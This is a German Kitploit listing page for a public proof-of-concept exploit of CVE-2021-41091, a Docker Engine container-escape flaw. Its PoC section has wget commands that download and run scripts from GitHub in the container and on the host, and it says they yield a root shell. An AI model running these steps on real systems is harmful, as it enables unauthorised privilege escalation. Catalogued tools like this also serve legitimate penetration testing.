Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2021-41091 — Proof-of-Concept-Exploit für CVE-2021-41091: Moby (Docker Engine) Verzeichnis-Traversal, der es unprivilegierten Benutzern erlaubt, SUID-Binärdateien aus dem Container auf dem Host auszuführen. Enthält PoC-Skripte für Ubuntu 20.04. | Kitploit
Tools/GitHubGitHub/jrbh4ck/cve-2021-41091
Privilege EscalationContainer-SicherheitSchwachstellenanalyseExploitationPenetrationstestsContainer-Ausbruch
GitHubjrbh4ck/cve-2021-41091

CVE-2021-41091

Proof-of-Concept-Exploit für CVE-2021-41091: Moby (Docker Engine) Verzeichnis-Traversal, der es unprivilegierten Benutzern erlaubt, SUID-Binärdateien aus dem Container auf dem Host auszuführen. Enthält PoC-Skripte für Ubuntu 20.04.

Repository anzeigen
6vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2021-41091

Ein Fehler in Moby (Docker Engine) erlaubt unprivilegierten Benutzern, Verzeichnisse zu durchqueren und Programme direkt aus dem Docker auf dem Host auszuführen. Falls im Docker ein suid-Programm vorhanden ist, kann der Benutzer es als suid auf dem Host ausführen.

PoC

Im Terminal des Containers laden wir die Datei docker.sh herunter und führen sie dann als root-Benutzer aus:

root@kitploit:~
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/docker.sh
chmod +x docker.sh
./docker.sh

Jetzt laden wir auf dem Host die Datei principal.sh herunter und führen sie aus:

root@kitploit:~
wget https://raw.githubusercontent.com/jrbH4CK/CVE-2021-41091/main/principal.sh
chmod +x principal.sh
./principal.sh

Wir führen den Befehl aus, den uns die Datei gibt, und können /bin/bash als root ausführen.

Hinweise

Diese Skripte wurden auf Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64) mit Moby Version 20.10.5+dfsg1 getestet.

DIE NUTZUNG DIESES REPOSITORY LIEGT IN DER VERANTWORTUNG DES NUTZERS UND NICHT DES AUTORS.

Tool herunterladen